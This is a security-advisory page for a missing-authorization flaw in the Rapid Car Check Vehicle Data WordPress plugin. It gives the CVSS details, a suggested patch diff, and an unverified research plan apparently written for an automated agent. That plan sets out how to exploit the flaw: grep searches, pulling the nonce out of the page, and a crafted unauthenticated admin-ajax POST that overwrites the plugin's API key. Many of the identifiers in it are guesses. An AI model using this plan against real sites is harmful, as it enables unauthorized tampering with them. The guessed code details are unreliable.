WP-Safety
CVE-2026-39687

Rapid Car Check Vehicle Data <= 2.0 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Rapid Car Check Vehicle Data plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.0
PublishedFebruary 23, 2026
Last updatedApril 15, 2026
Affected pluginfree-vehicle-data-uk
Research Plan
Unverified

This research plan targets a missing authorization vulnerability in the **Rapid Car Check Vehicle Data** plugin (version <= 2.0). Since source files are not provided, this plan relies on common vulnerability patterns for this plugin type and provides specific search commands to ground the exploit in…

Show full research plan

This research plan targets a missing authorization vulnerability in the Rapid Car Check Vehicle Data plugin (version <= 2.0). Since source files are not provided, this plan relies on common vulnerability patterns for this plugin type and provides specific search commands to ground the exploit in the actual code.

1. Vulnerability Summary

The Rapid Car Check Vehicle Data plugin (slug: free-vehicle-data-uk) fails to implement capability checks on functions responsible for administrative actions, most likely the saving of plugin settings or API keys.

The vulnerability typically resides in a function hooked to admin_init or wp_ajax_. In WordPress, admin_init fires for any request to /wp-admin/admin-ajax.php, even for unauthenticated users. If the hooked function lacks a current_user_can('manage_options') check, an unauthenticated attacker can trigger the logic.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Method: POST
  • Action: To be determined via code analysis (likely rcc_save_settings or a function hooked to admin_init).
  • Payload Parameters: Likely rcc_api_key or a settings array.
  • Authentication: None (Unauthenticated).
  • Preconditions: The plugin must be active.

3. Code Flow (Trace Path)

The agent must trace the following path:

  1. Entry Point: Search for functions hooked to admin_init or wp_ajax_nopriv_.
    • grep -rn "add_action.*admin_init" .
    • grep -rn "wp_ajax_" .
  2. Logic Sink: Identify which of these functions calls update_option, add_option, or wp_insert_post.
  3. Authorization Gap: Verify the absence of current_user_can() in the identified function.
  4. Parameter Mapping: Identify which $_POST or $_REQUEST keys are passed directly into update_option.

4. Nonce Acquisition Strategy

If the function uses check_ajax_referer or wp_verify_nonce, the nonce must be retrieved from the frontend.

  1. Identify Shortcode: Find the shortcode used to display vehicle data.
    • grep -rn "add_shortcode" . (Likely [rapid_car_check] or [rcc_search]).
  2. Setup Page: Create a page containing this shortcode to force the plugin to enqueue its scripts and nonces.
    • wp post create --post_type=page --post_status=publish --post_content='[shortcode_found]'
  3. Locate Localized Variable: Look for wp_localize_script in the source code to find the JS object name.
    • grep -rn "wp_localize_script" .
  4. Extract via Browser:
    • browser_navigate(URL_OF_CREATED_PAGE)
    • browser_eval("window.rcc_ajax_object?.nonce") (Replace rcc_ajax_object with the actual identifier found).

5. Exploitation Strategy

The goal is to modify the plugin's API key or settings, which can disable the vehicle check functionality or redirect data.

Target Action (Inferred): A function that handles settings saving.

Step-by-Step:

  1. Discovery: Run grep -r "update_option" . inside the plugin directory. Look for occurrences inside functions hooked to admin_init.
  2. Identify Option Name: If the code is $opt = $_POST['api_key']; update_option('rcc_api_settings', $opt);, the option name is rcc_api_settings.
  3. Craft Request:
    POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=rcc_save_settings&rcc_api_key=EXPLOITED_TOKEN&_wpnonce=[NONCE_IF_REQUIRED]
    Note: If the vulnerability is via admin_init, the action parameter might not be required if the function checks for a specific POST key instead.

6. Test Data Setup

  1. Install Plugin: Ensure free-vehicle-data-uk version 2.0 is installed.
  2. Identify Settings: Use WP-CLI to see current settings: wp option get rcc_settings (or similar).
  3. Create Nonce Source: Create a page with the plugin's search shortcode:
    • wp post create --post_type=page --post_status=publish --post_title='Vehicle Check' --post_content='[rapid-car-check-data]' (Verify shortcode name in code).

7. Expected Results

  • The server responds with 200 OK or a redirect.
  • The targeted WordPress option (rcc_api_key or similar) is updated with the attacker-supplied value.

8. Verification Steps

After sending the HTTP request, use WP-CLI to verify the integrity loss:

  1. Check the option value:
    • wp option get rcc_api_key
  2. Check if any settings arrays were modified:
    • wp option get rcc_settings
  3. Confirm the value matches EXPLOITED_TOKEN.

9. Alternative Approaches

If no admin_init or wp_ajax vulnerability is found:

  • REST API: Check for register_rest_route where 'permission_callback' => '__return_true' or is missing.
    • grep -rn "register_rest_route" . -A 5
  • Init Hook: Check add_action('init', ...) for logic that processes $_POST data without checking is_admin() AND current_user_can().
    • grep -rn "add_action.*init" .
  • Direct Request: If the plugin uses a custom router, check for template_redirect hooks.

Implementation Note for Agent:

Prioritize searching for the following function names (inferred from plugin logic):

  • rcc_save_api_settings
  • rapid_car_check_save_settings
  • save_rcc_options

Focus on File: includes/class-rcc-admin.php or the main plugin file.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Rapid Car Check Vehicle Data plugin for WordPress is vulnerable to unauthorized access in versions up to and including 2.0. This is due to a missing capability check on administrative functions, likely those hooked to admin_init, which allows unauthenticated attackers to modify plugin settings or API keys.

Security Fix

--- a/includes/class-rcc-admin.php
+++ b/includes/class-rcc-admin.php
@@ -10,6 +10,10 @@
 function rcc_save_settings() {
+	if ( ! current_user_can( 'manage_options' ) ) {
+		return;
+	}
+
 	if ( isset( $_POST['rcc_api_key'] ) ) {
 		update_option( 'rcc_api_settings', sanitize_text_field( $_POST['rcc_api_key'] ) );
 	}
 }

Exploit Outline

To exploit this vulnerability, an unauthenticated attacker can send a POST request to /wp-admin/admin-ajax.php. Because the plugin hooks settings-saving logic to admin_init without performing a current_user_can('manage_options') check, the logic will execute for any request to an admin endpoint. The attacker provides a payload such as 'action=rcc_save_settings&rcc_api_key=ATTACKER_KEY'. If a nonce is required, it can typically be extracted from the frontend of a page where the plugin's vehicle search shortcode is rendered, as the nonce is often localized for AJAX functionality.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/df3fe27a-4f5f-40a5-ae5a-bcf1232be0f0?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database